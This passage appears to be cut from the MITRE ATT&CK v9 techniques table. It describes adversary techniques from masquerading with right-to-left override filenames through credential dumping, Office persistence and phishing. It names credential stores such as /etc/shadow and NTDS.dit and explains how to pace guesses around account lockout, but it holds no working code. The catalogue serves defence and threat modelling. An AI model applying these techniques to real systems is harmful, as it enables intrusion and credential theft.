</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1036/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1036/002"> Right-to-Left Override </a> </td> <td> Adversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1036/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1036/003"> Rename System Utilities </a> </td> <td> Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>). An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1036/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1036/004"> Masquerade Task or Service </a> </td> <td> Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description. 
Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1036/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1036/005"> Match Legitimate Name or Location </a> </td> <td> Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1036/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1036/006"> Space after Filename </a> </td> <td> Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1556"> T1556 </a> </td> <td> <a href="/versions/v9/techniques/T1556"> Modify Authentication Process </a> </td> <td> Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. 
The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on macOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using <a href="/versions/v9/techniques/T1078">Valid Accounts</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1556/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1556/001"> Domain Controller Authentication </a> </td> <td> Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1556/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1556/002"> Password Filter DLL </a> </td> <td> Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1556/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1556/003"> Pluggable Authentication Modules </a> </td> <td> Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1556/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1556/004"> Network Device Authentication </a> </td> <td> Adversaries may use <a href="/versions/v9/techniques/T1601/001">Patch System Image</a> to hard code a password in the operating system, thus bypassing native authentication mechanisms for local accounts on network devices. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1578"> T1578 </a> </td> <td> <a href="/versions/v9/techniques/T1578"> Modify Cloud Compute Infrastructure </a> </td> <td> An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1578/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1578/001"> Create Snapshot </a> </td> <td> An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in <a href="/versions/v9/techniques/T1578/004">Revert Cloud Instance</a> where an adversary may revert to a snapshot to evade detection and remove evidence of their presence. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1578/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1578/002"> Create Cloud Instance </a> </td> <td> An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may <a href="/versions/v9/techniques/T1578/001">Create Snapshot</a> of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect <a href="/versions/v9/techniques/T1005">Data from Local System</a> or for <a href="/versions/v9/techniques/T1074/002">Remote Data Staging</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1578/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1578/003"> Delete Cloud Instance </a> </td> <td> An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1578/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1578/004"> Revert Cloud Instance </a> </td> <td> An adversary may revert changes made to a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1112"> T1112 </a> </td> <td> <a href="/versions/v9/techniques/T1112"> Modify Registry </a> </td> <td> Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1601"> T1601 </a> </td> <td> <a href="/versions/v9/techniques/T1601"> Modify System Image </a> </td> <td> Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1601/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1601/001"> Patch System Image </a> </td> <td> Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses. Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1601/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1601/002"> Downgrade System Image </a> </td> <td> Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1104"> T1104 </a> </td> <td> <a href="/versions/v9/techniques/T1104"> Multi-Stage Channels </a> </td> <td> Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1106"> T1106 </a> </td> <td> <a href="/versions/v9/techniques/T1106"> Native API </a> </td> <td> Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1599"> T1599 </a> </td> <td> <a href="/versions/v9/techniques/T1599"> Network Boundary Bridging </a> </td> <td> Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1599/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1599/001"> Network Address Translation Traversal </a> </td> <td> Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1498"> T1498 </a> </td> <td> <a href="/versions/v9/techniques/T1498"> Network Denial of Service </a> </td> <td> Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes and to support other malicious activities, including distraction, hacktivism, and extortion. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1498/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1498/001"> Direct Network Flood </a> </td> <td> Adversaries may attempt to cause a denial of service (DoS) by directly sending a high volume of network traffic to a target. <a href="/versions/v9/techniques/T1498/001">Direct Network Floods</a> are when one or more systems are used to send a high volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used, but stateful protocols such as TCP can be used as well. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1498/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1498/002"> Reflection Amplification </a> </td> <td> Adversaries may attempt to cause a denial of service by reflecting a high volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. 
An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1046"> T1046 </a> </td> <td> <a href="/versions/v9/techniques/T1046"> Network Service Scanning </a> </td> <td> Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1135"> T1135 </a> </td> <td> <a href="/versions/v9/techniques/T1135"> Network Share Discovery </a> </td> <td> Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1040"> T1040 </a> </td> <td> <a href="/versions/v9/techniques/T1040"> Network Sniffing </a> </td> <td> Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1095"> T1095 </a> </td> <td> <a href="/versions/v9/techniques/T1095"> Non-Application Layer Protocol </a> </td> <td> Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1571"> T1571 </a> </td> <td> <a href="/versions/v9/techniques/T1571"> Non-Standard Port </a> </td> <td> Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088 or port 587 as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1027"> T1027 </a> </td> <td> <a href="/versions/v9/techniques/T1027"> Obfuscated Files or Information </a> </td> <td> Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1027/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1027/001"> Binary Padding </a> </td> <td> Adversaries may use binary padding to add junk data and change the on-disk representation of malware. 
This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1027/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1027/002"> Software Packing </a> </td> <td> Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1027/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1027/003"> Steganography </a> </td> <td> Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1027/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1027/004"> Compile After Delivery </a> </td> <td> Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1027/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1027/005"> Indicator Removal from Tools </a> </td> <td> Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1588"> T1588 </a> </td> <td> <a href="/versions/v9/techniques/T1588"> Obtain Capabilities </a> </td> <td> Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1588/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1588/001"> Malware </a> </td> <td> Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1588/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1588/002"> Tool </a> </td> <td> Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) was not intended to be used for those purposes (ex: <a href="/versions/v9/software/S0029">PsExec</a>). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as <a href="/versions/v9/software/S0154">Cobalt Strike</a>. Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1588/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1588/003"> Code Signing Certificates </a> </td> <td> Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with. Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1588/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1588/004"> Digital Certificates </a> </td> <td> Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. 
They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1588/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1588/005"> Exploits </a> </td> <td> Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1588/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1588/006"> Vulnerabilities </a> </td> <td> Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1137"> T1137 </a> </td> <td> <a href="/versions/v9/techniques/T1137"> Office Application Startup </a> </td> <td> Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. 
There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1137/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1137/001"> Office Template Macros </a> </td> <td> Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1137/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1137/002"> Office Test </a> </td> <td> Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1137/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1137/003"> Outlook Forms </a> </td> <td> Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1137/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1137/004"> Outlook Home Page </a> </td> <td> Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1137/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1137/005"> Outlook Rules </a> </td> <td> Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1137/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1137/006"> Add-ins </a> </td> <td> Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. There are different types of add-ins that can be used by the various Office products, including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1003"> T1003 </a> </td> <td> <a href="/versions/v9/techniques/T1003"> OS Credential Dumping </a> </td> <td> Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform <a href="https://attack.mitre.org/tactics/TA0008">Lateral Movement</a> and access restricted information. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1003/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1003/001"> LSASS Memory </a> </td> <td> Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct <a href="https://attack.mitre.org/tactics/TA0008">Lateral Movement</a> using <a href="/versions/v9/techniques/T1550">Use Alternate Authentication Material</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1003/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1003/002"> Security Account Manager </a> </td> <td> Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1003/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1003/003"> NTDS </a> </td> <td> Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1003/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1003/004"> LSA Secrets </a> </td> <td> Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts. LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1003/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1003/005"> Cached Domain Credentials </a> </td> <td> Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1003/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1003/006"> DCSync </a> </td> <td> Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API) to simulate the replication process from a remote domain controller using a technique called DCSync. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1003/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1003/007"> Proc Filesystem </a> </td> <td> Adversaries may gather credentials from information stored in the Proc filesystem or <code>/proc</code>. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1003/008"> .008 </a> </td> <td> <a href="/versions/v9/techniques/T1003/008"> /etc/passwd and /etc/shadow </a> </td> <td> Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1201"> T1201 </a> </td> <td> <a href="/versions/v9/techniques/T1201"> Password Policy Discovery </a> </td> <td> Adversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through <a href="/versions/v9/techniques/T1110">Brute Force</a>. This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks that adhere to the policy (e.g. 
if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking more than 3-4 passwords per account if the lockout threshold is set to 6, so as not to lock out accounts). </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1120"> T1120 </a> </td> <td> <a href="/versions/v9/techniques/T1120"> Peripheral Device Discovery </a> </td> <td> Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1069"> T1069 </a> </td> <td> <a href="/versions/v9/techniques/T1069"> Permission Groups Discovery </a> </td> <td> Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1069/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1069/001"> Local Groups </a> </td> <td> Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1069/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1069/002"> Domain Groups </a> </td> <td> Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1069/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1069/003"> Cloud Groups </a> </td> <td> Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1566"> T1566 </a> </td> <td> <a href="/versions/v9/techniques/T1566"> Phishing </a> </td> <td> Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1566/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1566/001"> Spearphishing Attachment </a> </td> <td> Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. 
